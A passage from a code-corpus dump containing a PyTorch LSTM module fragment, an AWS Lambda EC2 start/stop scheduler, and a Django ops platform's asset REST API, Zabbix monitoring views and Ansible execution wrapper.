c_1 = torch.sigmoid(f)*c_0 + torch.sigmoid(i)*torch.tanh(g)
h_1 = torch.sigmoid(o) * torch.tanh(c_1)
return h_1, c_1
def __repr__(self):
s = '{name}({input_size}, {hidden_size})'
return s.format(name=self.__class__.__name__, **self.__dict__)
class RNN(nn.Module):
"""A module that runs multiple steps of LSTM or RCLSTM."""
def __init__(self, device, cell_class, input_size, hidden_size, connectivity,
num_layers=1, batch_first=True, dropout=0):
super(RNN, self).__init__()
self.device = device
self.cell_class = cell_class
self.input_size = input_size
self.hidden_size = hidden_size
self.connectivity = connectivity
self.num_layers = num_layers
self.batch_first = batch_first
self.dropout = dropout
for layer in range(num_layers):
layer_input_size = input_size if layer == 0 else hidden_size
if cell_class == 'lstm':
cell = LSTMCell(input_size=layer_input_size, hidden_size=hidden_size)
else:
cell = RCLSTMCell(input_size=layer_input_size, hidden_size=hidden_size, connectivity=connectivity, device=device)
setattr(self, 'cell_{}'.format(layer), cell)
self.reset_parameters()
def get_cell(self, layer):
return getattr(self, 'cell_{}'.format(layer))
def reset_parameters(self):
for layer in range(self.num_layers):
cell = self.get_cell(layer)
@staticmethod
def _forward_rnn(cell, input_, hx):
max_time = input_.size(0)
output = []
for time in range(max_time):
h_next, c_next = cell(input_=input_[max_time-1-time], hx=hx)
hx_next = (h_next, c_next)
output.append(h_next)
hx = hx_next
output = torch.stack(output, 0)
return output, hx
def forward(self, input_, hx=None):
if self.batch_first:
input_ = input_.transpose(0, 1)
max_time, batch_size, _ = input_.size()
if hx is None:
hx = input_.data.new(batch_size, self.hidden_size).zero_()
hx = (hx, hx)
h_n = []
c_n = []
layer_output = None
for layer in range(self.num_layers):
cell = self.get_cell(layer)
layer_output, (layer_h_n, layer_c_n) = RNN._forward_rnn(
cell=cell, input_=input_, hx=hx)
input_ = layer_output
h_n.append(layer_h_n)
c_n.append(layer_c_n)
output = layer_output
h_n = torch.stack(h_n, 0)
c_n = torch.stack(c_n, 0)
return output, (h_n, c_n)
``` |
{
"source": "jinjin123/aws-lambda-scheduler-stop-start",
"score": 3
} |
#### File: aws-lambda-scheduler-stop-start/package/ec2_handler.py
```python
import logging
import boto3
from botocore.exceptions import ClientError
# Setup simple logging for INFO
LOGGER = logging.getLogger()
LOGGER.setLevel(logging.INFO)
def ec2_handler(schedule_action, tag_key, tag_value):
"""
Aws ec2 scheduler function, stop or
start ec2 instances by using the tag defined.
"""
# Define the connection
ec2 = boto3.client('ec2')
# Retrieve instance list
ec2_instance_list = ec2_list_instances(tag_key, tag_value)
# Stop ec2 instances in list
if schedule_action == 'stop':
try:
ec2.stop_instances(InstanceIds=ec2_instance_list)
LOGGER.info("Stop instances %s", ec2_instance_list)
except ClientError:
print('No instance found')
# Start ec2 instances in list
elif schedule_action == 'start':
try:
ec2.start_instances(InstanceIds=ec2_instance_list)
LOGGER.info("Start instances %s", ec2_instance_list)
except ClientError:
print('No instance found')
def ec2_list_instances(tag_key, tag_value):
"""
Aws ec2 instance list function, list name of all ec2 instances
all ec2 instances with specific tag and return it in list.
"""
# Define the connection
ec2 = boto3.client('ec2')
paginator = ec2.get_paginator('describe_instances')
page_iterator = paginator.paginate(
Filters=[{'Name': 'tag:'+tag_key, 'Values': [tag_value]},
{'Name': 'instance-state-name', 'Values': ['pending',
'running',
'stopping',
'stopped']}])
# Initialize instance list
instance_list = []
# Retrieve ec2 instances
for page in page_iterator:
for reservation in page['Reservations']:
for instance in reservation['Instances']:
# Retrieve ec2 instance id and add in list
instance_id = instance['InstanceId']
instance_list.insert(0, instance_id)
return instance_list
``` |
{
"source": "jinjin123/devops2.0",
"score": 2
} |
#### File: ops/api/assets_api.py
```python
from rest_framework import viewsets, permissions
from ops.serializers import *
from ops.models import *
from rest_framework import status
from django.http import Http404
from rest_framework.views import APIView
from rest_framework.response import Response
from rest_framework.decorators import api_view
from ops.views.tasks.tasks import recordAssets
from django.contrib.auth.decorators import permission_required
@api_view(['GET', 'POST'])
def idc_list(request, format=None):
if request.method == 'GET':
snippets = Idc_Assets.objects.all()
serializer = IdcSerializer(snippets, many=True)
return Response(serializer.data)
elif request.method == 'POST':
serializer = IdcSerializer(data=request.data)
if serializer.is_valid():
serializer.save()
recordAssets.delay(user=str(request.user),
content="添加机房:{name}".format(name=request.data.get("name")),
type="idc", id=serializer.data.get('id'))
return Response(serializer.data, status=status.HTTP_201_CREATED)
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
@api_view(['GET', 'PUT', 'DELETE'])
def idc_detail(request, id, format=None):
try:
snippet = Idc_Assets.objects.get(id=id)
except Idc_Assets.DoesNotExist:
return Response(status=status.HTTP_404_NOT_FOUND)
if request.method == 'GET':
serializer = IdcSerializer(snippet)
return Response(serializer.data)
elif request.method == 'PUT':
serializer = IdcSerializer(snippet, data=request.data)
old_name = snippet.name
print old_name,snippet,serializer
if serializer.is_valid():
serializer.save()
recordAssets.delay(user=str(request.user), content="更新资产:{name}".format(name=snippet.name), type="idc",id=id)
return Response(serializer.data)
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
elif request.method == 'DELETE' and request.user.has_perm('ops.can_delete_assets'):
if not request.user.has_perm('ops.can_delete_service_assets'):
return Response(status=status.HTTP_403_FORBIDDEN)
snippet.delete()
recordAssets.delay(user=str(request.user),
content="删除idc:{name}".format(name=snippet.name), type="idc",id=id)
return Response(status=status.HTTP_204_NO_CONTENT)
@api_view(['GET', 'POST'])
def business_list(request, format=None):
if request.method == 'GET':
snippets = Business_Assets.objects.all()
serializer = BusinessSerializer(snippets, many=True)
return Response(serializer.data)
elif request.method == 'POST':
serializer = BusinessSerializer(data=request.data)
if serializer.is_valid():
serializer.save()
recordAssets.delay(user=str(request.user),
content="添加业务分组名称:{business_name}".format(business_name=request.data.get("business_name")),
type="business", id=serializer.data.get('id'))
return Response(serializer.data, status=status.HTTP_201_CREATED)
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
@api_view(['GET', 'PUT', 'DELETE'])
def business_detail(request, id, format=None):
try:
snippet = Business_Assets.objects.get(id=id)
except Business_Assets.DoesNotExist:
return Response(status=status.HTTP_404_NOT_FOUND)
if request.method == 'GET':
serializer = BusinessSerializer(snippet)
return Response(serializer.data)
elif request.method == 'PUT':
serializer = BusinessSerializer(snippet, data=request.data)
old_name = snippet.business_name
if serializer.is_valid():
serializer.save()
recordAssets.delay(user=str(request.user),
content="修改业务分组为:{old_name} -> {business_name}".format(old_name=old_name,
business_name=request.data.get(
"business_name")),
type="business", id=id)
return Response(serializer.data)
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
elif request.method == 'DELETE' and request.user.has_perm('ops.can_delete_assets'):
if not request.user.has_perm('ops.can_delete_service_assets'):
return Response(status=status.HTTP_403_FORBIDDEN)
snippet.delete()
recordAssets.delay(user=str(request.user),
content="删除业务类型:{business_name}".format(business_name=snippet.business_name), type="business",
id=id)
return Response(status=status.HTTP_204_NO_CONTENT)
@api_view(['GET', 'POST'])
def service_list(request, format=None):
"""
List all order, or create a server assets order.
"""
if request.method == 'GET':
snippets = Service_Assets.objects.all()
serializer = ServiceSerializer(snippets, many=True)
return Response(serializer.data)
elif request.method == 'POST':
serializer = ServiceSerializer(data=request.data)
if serializer.is_valid():
serializer.save()
recordAssets.delay(user=str(request.user),
content="添加业务类型名称:{service_name}".format(service_name=request.data.get("service_name")),
type="service", id=serializer.data.get('id'))
return Response(serializer.data, status=status.HTTP_201_CREATED)
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
@api_view(['GET', 'PUT', 'DELETE'])
def service_detail(request, id, format=None):
"""
Retrieve, update or delete a server assets instance.
"""
try:
snippet = Service_Assets.objects.get(id=id)
except Service_Assets.DoesNotExist:
return Response(status=status.HTTP_404_NOT_FOUND)
if request.method == 'GET':
serializer = ServiceSerializer(snippet)
return Response(serializer.data)
elif request.method == 'PUT':
serializer = ServiceSerializer(snippet, data=request.data)
old_name = snippet.service_name
if serializer.is_valid():
serializer.save()
recordAssets.delay(user=str(request.user),
content="修改业务类型为:{old_name} -> {service_name}".format(old_name=old_name,
service_name=request.data.get(
"service_name")),
type="service", id=id)
return Response(serializer.data)
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
elif request.method == 'DELETE' and request.user.has_perm('ops.can_delete_assets'):
if not request.user.has_perm('ops.can_delete_service_assets'):
return Response(status=status.HTTP_403_FORBIDDEN)
snippet.delete()
recordAssets.delay(user=str(request.user),
content="删除业务类型:{service_name}".format(service_name=snippet.service_name), type="service",
id=id)
return Response(status=status.HTTP_204_NO_CONTENT)
@api_view(['GET', 'POST'])
def group_list(request, format=None):
"""
List all order, or create a server assets order.
"""
if request.method == 'GET':
snippets = RoleList.objects.all()
serializer = GroupSerializer(snippets, many=True)
return Response(serializer.data)
elif request.method == 'POST':
if not request.user.has_perm('ops.change_group'):
return Response(status=status.HTTP_403_FORBIDDEN)
serializer = GroupSerializer(data=request.data)
if serializer.is_valid():
serializer.save()
recordAssets.delay(user=str(request.user),
content="添加用户组:{group_name}".format(group_name=request.data.get("name")), type="group",
id=serializer.data.get('id'))
return Response(serializer.data, status=status.HTTP_201_CREATED)
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
@api_view(['GET', 'PUT', 'DELETE'])
@permission_required('ops.change_group', raise_exception=True)
def group_detail(request, id, format=None):
"""
Retrieve, update or delete a server assets instance.
"""
try:
snippet = RoleList.objects.get(id=id)
except RoleList.DoesNotExist:
return Response(status=status.HTTP_404_NOT_FOUND)
if request.method == 'GET':
serializer = GroupSerializer(snippet)
return Response(serializer.data)
elif request.method == 'PUT':
serializer = GroupSerializer(snippet, data=request.data)
old_name = snippet.name
if serializer.is_valid():
serializer.save()
recordAssets.delay(user=str(request.user),
content="修改用户组名称:{old_name} -> {group_name}".format(old_name=old_name,
group_name=request.data.get("name")),
type="group", id=id)
return Response(serializer.data)
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
elif request.method == 'DELETE':
if not request.user.has_perm('ops.delete_group'):
return Response(status=status.HTTP_403_FORBIDDEN)
snippet.delete()
recordAssets.delay(user=str(request.user), content="删除用户组:{group_name}".format(group_name=snippet.group_name),
type="group", id=id)
return Response(status=status.HTTP_204_NO_CONTENT)
@api_view(['GET', 'POST'])
@permission_required('ops.can_add_zone_assets', raise_exception=True)
def zone_list(request, format=None):
"""
List all order, or create a server assets order.
"""
if request.method == 'GET':
snippets = Zone_Assets.objects.all()
serializer = ZoneSerializer(snippets, many=True)
return Response(serializer.data)
elif request.method == 'POST':
serializer = ZoneSerializer(data=request.data)
if serializer.is_valid():
serializer.save()
recordAssets.delay(user=str(request.user),
content="添加出口线路:{zone_name}".format(zone_name=request.data.get("zone_name")),
type="zone", id=serializer.data.get('id'))
return Response(serializer.data, status=status.HTTP_201_CREATED)
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
@api_view(['GET', 'PUT', 'DELETE'])
@permission_required('ops.can_change_zone_assets', raise_exception=True)
def zone_detail(request, id, format=None):
"""
Retrieve, update or delete a server assets instance.
"""
try:
snippet = Zone_Assets.objects.get(id=id)
except Zone_Assets.DoesNotExist:
return Response(status=status.HTTP_404_NOT_FOUND)
if request.method == 'GET':
serializer = ZoneSerializer(snippet)
return Response(serializer.data)
elif request.method == 'PUT':
old_name = snippet.zone_name
serializer = ZoneSerializer(snippet, data=request.data)
if serializer.is_valid():
serializer.save()
recordAssets.delay(user=str(request.user),
content="修改出口线路类型:{old_name} -> {zone_name}".format(old_name=old_name,
zone_name=request.data.get(
"zone_name")), type="zone",
id=id)
return Response(serializer.data)
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
elif request.method == 'DELETE':
if not request.user.has_perm('ops.can_delete_zone_assets'):
return Response(status=status.HTTP_403_FORBIDDEN)
snippet.delete()
recordAssets.delay(user=str(request.user), content="删除出口线路:{zone_name}".format(zone_name=snippet.zone_name),
type="zone", id=id)
return Response(status=status.HTTP_204_NO_CONTENT)
@api_view(['GET', 'POST'])
@permission_required('ops.can_add_line_assets', raise_exception=True)
def line_list(request, format=None):
"""
List all order, or create a server assets order.
"""
if request.method == 'GET':
snippets = Line_Assets.objects.all()
serializer = LineSerializer(snippets, many=True)
return Response(serializer.data)
elif request.method == 'POST':
serializer = LineSerializer(data=request.data)
if serializer.is_valid():
serializer.save()
recordAssets.delay(user=str(request.user),
content="添加出口线路:{line_name}".format(line_name=request.data.get("line_name")),
type="line", id=serializer.data.get('id'))
return Response(serializer.data, status=status.HTTP_201_CREATED)
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
@api_view(['GET', 'PUT', 'DELETE'])
@permission_required('OpsManage.can_change_line_assets', raise_exception=True)
def line_detail(request, id, format=None):
"""
Retrieve, update or delete a server assets instance.
"""
try:
snippet = Line_Assets.objects.get(id=id)
except Line_Assets.DoesNotExist:
return Response(status=status.HTTP_404_NOT_FOUND)
if request.method == 'GET':
serializer = LineSerializer(snippet)
return Response(serializer.data)
elif request.method == 'PUT':
serializer = LineSerializer(snippet, data=request.data)
old_name = snippet.line_name
if serializer.is_valid():
serializer.save()
recordAssets.delay(user=str(request.user),
content="修改出口线路类型:{old_name} -> {line_name}".format(old_name=old_name,
line_name=request.data.get(
"line_name")), type="line",
id=id)
return Response(serializer.data)
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
elif request.method == 'DELETE':
if not request.user.has_perm('ops.can_delete_line_assets'):
return Response(status=status.HTTP_403_FORBIDDEN)
snippet.delete()
recordAssets.delay(user=str(request.user), content="删除出口线路:{line_name}".format(line_name=snippet.line_name),
type="line", id=id)
return Response(status=status.HTTP_204_NO_CONTENT)
@api_view(['GET', 'POST'])
def raid_list(request, format=None):
"""
List all order, or create a server assets order.
"""
if request.method == 'GET':
snippets = Raid_Assets.objects.all()
serializer = RaidSerializer(snippets, many=True)
return Response(serializer.data)
elif request.method == 'POST':
serializer = RaidSerializer(data=request.data)
if serializer.is_valid():
serializer.save()
recordAssets.delay(user=str(request.user),
content="添加Raid类型:{raid_name}".format(raid_name=request.data.get("raid_name")),
type="raid", id=serializer.data.get('id'))
return Response(serializer.data, status=status.HTTP_201_CREATED)
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
@api_view(['GET', 'PUT', 'DELETE'])
def raid_detail(request, id, format=None):
"""
Retrieve, update or delete a server assets instance.
"""
try:
snippet = Raid_Assets.objects.get(id=id)
except Raid_Assets.DoesNotExist:
return Response(status=status.HTTP_404_NOT_FOUND)
if request.method == 'GET':
serializer = RaidSerializer(snippet)
return Response(serializer.data)
elif request.method == 'PUT':
old_name = snippet.raid_name
serializer = RaidSerializer(snippet, data=request.data)
if serializer.is_valid():
serializer.save()
recordAssets.delay(user=str(request.user),
content="修改Raid类型:{old_name} -> {raid_name}".format(old_name=old_name,
raid_name=request.data.get(
"raid_name")), type="raid",
id=id)
return Response(serializer.data)
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
elif request.method == 'DELETE':
if not request.user.has_perm('ops.can_delete_raid_assets'):
return Response(status=status.HTTP_403_FORBIDDEN)
snippet.delete()
recordAssets.delay(user=str(request.user), content="删除Raid类型:{raid_name}".format(raid_name=snippet.raid_name),
type="raid", id=id)
return Response(status=status.HTTP_204_NO_CONTENT)
@api_view(['GET', 'POST'])
def asset_list(request, format=None):
if request.method == 'GET':
snippets = Assets.objects.all()
serializer = AssetsSerializer(snippets, many=True)
return Response(serializer.data)
elif request.method == 'POST':
serializer = AssetsSerializer(data=request.data)
if serializer.is_valid():
serializer.save()
recordAssets.delay(user=str(request.user), content="添加资产:{name}".format(name=request.data.get("name")),
type="assets", id=serializer.data.get('id'))
return Response(serializer.data, status=status.HTTP_201_CREATED)
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
@api_view(['GET', 'PUT', 'DELETE'])
def asset_detail(request, id, format=None):
try:
snippet = Assets.objects.get(id=id)
except Assets.DoesNotExist:
return Response(status=status.HTTP_404_NOT_FOUND)
if request.method == 'GET':
serializer = AssetsSerializer(snippet)
return Response(serializer.data)
elif request.method == 'PUT':
serializer = AssetsSerializer(snippet, data=request.data)
if serializer.is_valid():
serializer.save()
recordAssets.delay(user=str(request.user), content="更新资产:{name}".format(name=snippet.name), type="assets",id=id)
return Response(serializer.data)
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
elif request.method == 'DELETE':
if not request.user.has_perm('ops.delete_asset_assets'):
return Response(status=status.HTTP_403_FORBIDDEN)
snippet.delete()
recordAssets.delay(user=str(request.user), content="删除资产:{name}".format(name=snippet.name), type="assets",
id=id)
return Response(status=status.HTTP_204_NO_CONTENT)
@api_view(['GET', 'POST'])
def asset_server_list(request, format=None):
if request.method == 'GET':
snippets = HostInfo.objects.all()
serializer = ServerSerializer(snippets, many=True)
return Response(serializer.data)
elif request.method == 'POST':
if (request.data.get('data')):
data = request.data.get('data')
else:
data = request.data
# keyword = ['ip','user','login_type','pwd','key']
"""
添加资产不检查server login , 使用crontab定时抽取 user不为空的资产信息 sshCheck 在更新状态 到数据库里
"""
print(data)
serializer = ServerSerializer(data=data)
# print serializer
if serializer.is_valid():
serializer.save()
recordAssets.delay(user=str(request.user), content="添加服务器资产:{ip}".format(ip=data.get("ip")), type="server",
id=serializer.data.get('id'))
return Response(serializer.data, status=status.HTTP_201_CREATED)
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
@api_view(['GET', 'PUT', 'DELETE'])
def asset_server_detail(request, id, format=None):
try:
snippet = HostInfo.objects.get(id=id)
except HostInfo.DoesNotExist:
return Response(status=status.HTTP_404_NOT_FOUND)
if request.method == 'GET':
serializer = ServerSerializer(snippet)
return Response(serializer.data)
elif request.method == 'PUT':
'''如果更新字段包含assets则先更新总资产表'''
print(request.data.get('data'))
if (request.data.get('data')):
data = request.data.get('data')
else:
data = request.data
if (data.get('assets')):
assets_data = data.pop('assets')
try:
assets_snippet = Assets.objects.get(id=snippet.assets.id)
assets = AssetsSerializer(assets_snippet, data=assets_data)
except Assets.DoesNotExist:
return Response(status=status.HTTP_404_NOT_FOUND)
if assets.is_valid():
assets.save()
recordAssets.delay(user=str(request.user), content="修改服务器资产:{ip}".format(ip=snippet.ip), type="server",
id=id)
print(data)
serializer = ServerSerializer(snippet,data=data)
if serializer.is_valid():
serializer.save()
return Response(serializer.data)
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
elif request.method == 'DELETE':
if not request.user.has_perm('ops.can_delete_server_assets'):
return Response(status=status.HTTP_403_FORBIDDEN)
snippet.delete()
try:
assets_snippet = Assets.objects.get(id=snippet.assets.id)
assets_snippet.delete()
recordAssets.delay(user=str(request.user), content="删除服务器资产:{ip}".format(ip=snippet.ip), type="server",
id=id)
except Assets.DoesNotExist:
pass
return Response(status=status.HTTP_204_NO_CONTENT)
@api_view(['GET', 'POST'])
def asset_net_list(request, format=None):
"""
List all order, or create a new net assets.
"""
if request.method == 'GET':
snippets = Network_Assets.objects.all()
serializer = NetworkSerializer(snippets, many=True)
return Response(serializer.data)
elif request.method == 'POST':
if (request.data.get('data')):
data = request.data.get('data')
else:
data = request.data
serializer = NetworkSerializer(data=data)
if serializer.is_valid():
serializer.save()
recordAssets.delay(user=str(request.user), content="添加网络设备资产:{ip}".format(ip=data.get("ip")), type="net",
id=serializer.data.get('id'))
return Response(serializer.data, status=status.HTTP_201_CREATED)
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
@api_view(['GET', 'PUT', 'DELETE'])
def asset_net_detail(request, id, format=None):
"""
Retrieve, update or delete a net assets instance.
"""
try:
snippet = Network_Assets.objects.get(id=id)
except Network_Assets.DoesNotExist:
return Response(status=status.HTTP_404_NOT_FOUND)
if request.method == 'GET':
serializer = NetworkSerializer(snippet)
return Response(serializer.data)
elif request.method == 'PUT':
'''如果更新字段包含assets则先更新总资产表'''
if (request.data.get('data')):
data = request.data.get('data')
else:
data = request.data
if (data.get('assets')):
assets_data = data.pop('assets')
try:
assets_snippet = Assets.objects.get(id=snippet.assets.id)
assets = AssetsSerializer(assets_snippet, data=assets_data)
except Assets.DoesNotExist:
return Response(status=status.HTTP_404_NOT_FOUND)
if assets.is_valid():
assets.save()
serializer = NetworkSerializer(snippet, data=data)
if serializer.is_valid():
serializer.save()
recordAssets.delay(user=str(request.user), content="更新网络设备资产:{ip}".format(ip=snippet.ip), type="net", id=id)
return Response(serializer.data)
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
elif request.method == 'DELETE':
if not request.user.has_perm('ops.delete_net_assets'):
return Response(status=status.HTTP_403_FORBIDDEN)
snippet.delete()
try:
assets_snippet = Assets.objects.get(id=snippet.assets.id)
assets_snippet.delete()
recordAssets.delay(user=str(request.user), content="删除网络设备资产:{ip}".format(ip=snippet.ip), type="net", id=id)
except Assets.DoesNotExist:
pass
return Response(status=status.HTTP_204_NO_CONTENT)
```
#### File: ops/api/zabbix_api.py
```python
from __future__ import division
from rest_framework import viewsets, mixins
from rest_framework.viewsets import ViewSet
from rest_framework import status
from rest_framework.response import Response
from rest_framework.decorators import api_view
from ops.views.zabbix import zabbix
import time
from datetime import datetime
"""
主机列表,根据组来查询
"""
@api_view(['GET'])
def HostView(request):
group = request.GET.get('group', None)
if group:
return Response(zabbix.host_list(group))
else:
return Response(zabbix.host_list())
"""
主机组列表
"""
@api_view(['GET'])
def GroupView(request):
return Response(zabbix.group_list())
"""
获取主机cpu监控数据
"""
@api_view(['GET'])
def CpuView(request,hostid):
List = zabbix.cpu_list(hostid)
arr1 = []
arr2 = []
for i in List:
# print i
arr1.append(int(i[u'clock']) * 1000)
# 需要考虑整数 浮点数
arr1.append(float(i[u'value']))
arr2.append(arr1)
arr1=[]
return Response(arr2)
# return Response(zabbix.cpu_list(hostid))
"""
获取主机memory监控数据
"""
@api_view(['GET'])
def MemoryView(request,hostid):
List = zabbix.memory_list(hostid)
arr1 = []
arr2 = []
for i in List:
# print i
arr1.append(int(i[u'clock']) * 1000)
# 毫秒时间戳 一天需要 24 * 3600 * 1000
arr1.append(float(round(int(i[u'value']) / 1024 / 1024 /1024,2)))
arr2.append(arr1)
arr1=[]
return Response(arr2)
# return Response(zabbix.memory_list(hostid))
"""
获取主机disk监控数据
"""
@api_view(['GET'])
def DiskView(request,hostid):
List = zabbix.disk_list(hostid)
arr1 = []
arr2 = []
for i in List:
# print i
arr1.append(int(i[u'clock']) * 1000)
# 毫秒时间戳 一天需要 24 * 3600 * 1000
arr1.append(float(round(int(i[u'value']) / 1024 / 1024 /1024,2)))
arr2.append(arr1)
arr1=[]
return Response(arr2)
# return Response(zabbix.disk_list(hostid))
"""
获取CPU,内存,磁盘使用占比
"""
@api_view(['GET'])
def UsageView(request, hostid):
if hostid:
return Response(zabbix.usage(hostid))
else:
return Response()
"""
获取事件列表
"""
@api_view(['GET'])
def EventView(request):
return Response(zabbix.event_list())
"""
获取服务类型(如 Httpd/FTP)获取监控历史数据
"""
@api_view(['GET'])
def ServiceItemsView(request, *args, **kwargs):
service = request.query_params.get('service', None)
history_list = zabbix.service_item_list(service)
return Response(history_list)
"""
根据 itemid 获取历史数据
"""
@api_view(['GET'])
def HistoryView(request,itemid):
history_list = zabbix.history_list(itemid)
return Response(history_list)
```
#### File: views/asb_model/ansibleApi.py
```python
import json, sys, os,redis
from collections import namedtuple
from ansible.parsing.dataloader import DataLoader
from ansible.vars import VariableManager
from ansible.inventory import Inventory, Host, Group
from ansible.playbook.play import Play
from ansible.executor.task_queue_manager import TaskQueueManager
from ansible.plugins.callback import CallbackBase
from ansible.executor.playbook_executor import PlaybookExecutor
from ops.views.ssh_settings import redisip,redisport
r = redis.StrictRedis(host=redisip, port=redisport, db=0)
# r = redis.StrictRedis(host='172.16.17.32', port='23456', db=0)
class MyInventory(Inventory):
"""
this is my ansible inventory object.
"""
def __init__(self, resource, loader, variable_manager):
"""
resource的数据格式是一个列表字典,比如
{
"group1": {
"hosts": [{"hostname": "10.0.0.0", "port": "22", "username": "test", "password": "<PASSWORD>"}, ...],
"vars": {"var1": value1, "var2": value2, ...}
}
}
如果你只传入1个列表,这默认该列表内的所有主机属于my_group组,比如
[{"hostname": "10.0.0.0", "port": "22", "username": "test", "password": "<PASSWORD>"}, ...]
"""
self.resource = resource
self.inventory = Inventory(loader=loader, variable_manager=variable_manager, host_list=[])
self.dynamic_inventory()
def add_dynamic_group(self, hosts, groupname, groupvars=None):
"""
add hosts to a group
"""
my_group = Group(name=groupname)
# if group variables exists, add them to group
if groupvars:
for key, value in groupvars.iteritems():
my_group.set_variable(key, value)
# add hosts to group
for host in hosts:
# set connection variables
hostname = host.get("hostname")
hostip = host.get('ip', hostname)
hostport = host.get("port")
username = host.get("username")
password = host.get("password")
ssh_key = host.get("ssh_key")
my_host = Host(name=hostname, port=hostport)
my_host.set_variable('ansible_ssh_host', hostip)
my_host.set_variable('ansible_ssh_port', hostport)
my_host.set_variable('ansible_ssh_user', username)
my_host.set_variable('ansible_ssh_pass', password)
my_host.set_variable('ansible_ssh_private_key_file', ssh_key)
# set other variables
for key, value in host.items():
if key not in ["hostname", "port", "username", "password"]:
my_host.set_variable(key, value)
# add to group
my_group.add_host(my_host)
self.inventory.add_group(my_group)
def dynamic_inventory(self):
"""
add hosts to inventory.
"""
if isinstance(self.resource, list):
self.add_dynamic_group(self.resource, 'default_group')
elif isinstance(self.resource, dict):
for groupname, hosts_and_vars in self.resource.iteritems():
self.add_dynamic_group(hosts_and_vars.get("hosts"), groupname, hosts_and_vars.get("vars"))
class ModelResultsCollector(CallbackBase):
def __init__(self, *args, **kwargs):
super(ModelResultsCollector, self).__init__(*args, **kwargs)
self.host_ok = {}
self.host_unreachable = {}
self.host_failed = {}
def v2_runner_on_unreachable(self, result):
self.host_unreachable[result._host.get_name()] = result
def v2_runner_on_ok(self, result, *args, **kwargs):
self.host_ok[result._host.get_name()] = result
def v2_runner_on_failed(self, result, *args, **kwargs):
self.host_failed[result._host.get_name()] = result
class ModelResultsCollectorToRedis(CallbackBase):
def __init__(self, redisKey, *args, **kwargs):
super(ModelResultsCollectorToRedis, self).__init__(*args, **kwargs)
self.host_ok = {}
self.host_unreachable = {}
self.host_failed = {}
self.redisKey = redisKey
def v2_runner_on_unreachable(self, result):
for remove_key in ('changed', 'invocation'):
if remove_key in result._result:
del result._result[remove_key]
data = "{host} | UNREACHABLE! => {stdout}".format(host=result._host.get_name(),
stdout=json.dumps(result._result, indent=4))
r.lpush(self.redisKey, data)
def v2_runner_on_ok(self, result, *args, **kwargs):
self.host_ok[result._host.get_name()] = result
for remove_key in ('changed', 'invocation'):
if remove_key in result._result:
del result._result[remove_key]
if 'rc' in result._result and 'stdout' in result._result:
data = "{host} | SUCCESS | rc={rc} >> \n{stdout}".format(host=result._host.get_name(),
rc=result._result.get('rc'),
stdout=result._result.get('stdout'))
else:
data = "{host} | SUCCESS >> {stdout}".format(host=result._host.get_name(),
stdout=json.dumps(result._result, indent=4))
# print data
r.lpush(self.redisKey, data)
def v2_runner_on_failed(self, result, *args, **kwargs):
for remove_key in ('changed', 'invocation'):
if remove_key in result._result:
del result._result[remove_key]
if 'rc' in result._result and 'stdout' in result._result:
data = "{host} | FAILED | rc={rc} >> \n{stdout}".format(host=result._host.get_name(),
rc=result._result.get('rc'),
stdout=result._result.get('stdout'))
else:
data = "{host} | FAILED! => {stdout}".format(host=result._host.get_name(),
stdout=json.dumps(result._result, indent=4))
r.lpush(self.redisKey, data)
class PlayBookResultsCollectorToRedis(CallbackBase):
CALLBACK_VERSION = 2.0
def __init__(self, redisKey, *args, **kwargs):
super(PlayBookResultsCollectorToRedis, self).__init__(*args, **kwargs)
self.task_ok = {}
self.task_skipped = {}
self.task_failed = {}
self.task_status = {}
self.task_unreachable = {}
self.task_changed = {}
self.redisKey = redisKey
def v2_runner_on_ok(self, result, *args, **kwargs):
self.task_ok[result._host.get_name()] = result._result
delegated_vars = result._result.get('_ansible_delegated_vars', None)
if result._task.action in ('include', 'include_role'):
return
elif result._result.get('changed', False):
if delegated_vars:
msg = "changed: [%s -> %s]" % (result._host.get_name(), delegated_vars['ansible_host'])
else:
msg = "changed: [%s]" % result._host.get_name()
else:
if delegated_vars:
msg = "ok: [%s -> %s]" % (result._host.get_name(), delegated_vars['ansible_host'])
else:
msg = "ok: [%s]" % result._host.get_name()
r.lpush(self.redisKey, msg)
def v2_runner_on_failed(self, result, *args, **kwargs):
delegated_vars = result._result.get('_ansible_delegated_vars', None)
self.task_failed[result._host.get_name()] = result._result
if delegated_vars:
msg = "fatal: [{host} -> {delegated_vars}]: FAILED! => {msg}".format(host=result._host.get_name(),
delegated_vars=delegated_vars[
'ansible_host'],
msg=json.dumps(result._result))
else:
msg = "fatal: [{host}]: FAILED! => {msg}".format(host=result._host.get_name(),
msg=json.dumps(result._result))
r.lpush(self.redisKey, msg)
def v2_runner_on_unreachable(self, result):
self.task_unreachable[result._host.get_name()] = result._result
msg = "fatal: [{host}]: UNREACHABLE! => {msg}\n".format(host=result._host.get_name(),
msg=json.dumps(result._result))
r.lpush(self.redisKey, msg)
def v2_runner_on_changed(self, result):
self.task_changed[result._host.get_name()] = result._result
msg = "changed: [{host}]\n".format(host=result._host.get_name())
r.lpush(self.redisKey, msg)
def v2_runner_on_skipped(self, result):
self.task_ok[result._host.get_name()] = result._result
msg = "skipped: [{host}]\n".format(host=result._host.get_name())
r.lpush(self.redisKey, msg)
def v2_playbook_on_play_start(self, play):
name = play.get_name().strip()
if not name:
msg = u"PLAY"
else:
msg = u"PLAY [%s] " % name
if len(msg) < 80: msg = msg + '*' * (79 - len(msg))
r.lpush(self.redisKey, msg)
def _print_task_banner(self, task):
